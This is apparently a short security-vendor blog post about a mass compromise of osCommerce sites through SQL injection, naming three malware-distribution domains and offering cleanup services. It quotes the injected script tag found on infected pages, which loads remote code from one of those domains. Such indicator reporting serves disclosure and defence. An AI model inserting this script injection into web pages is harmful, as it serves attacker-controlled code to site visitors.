Research Blog

osCommerce compromises – 1see.ir/j/, willysy.com and exero.eu

We are tracking for the last few days a large scale attack against osCommerce sites. First, it started as an SQL injection using willysy.com and exero.eu to distribute the malware, but now it expanded to use 1see.ir/j/ as well.

 
This is what shows on an infected site:

<script src=http://1see.ir/j/></scrip>

Sucuri identifies those type of web-based malware as: http://sucuri.net/malware/malware-entry-mwjs1241 and you can get more details in there as well.

 
Our support team can clean it up for you if you are infected. Sign up with us here: http://sucuri.net/signup and we will get it sorted out pretty quickly.

 
If you have any question, let us know (support@sucuri.net).

 

Client Love

Customer satisfaction is our top priority and our clients can confirm. Check out some real recommendations from real clients.
   
   

Scan your website FOR FREE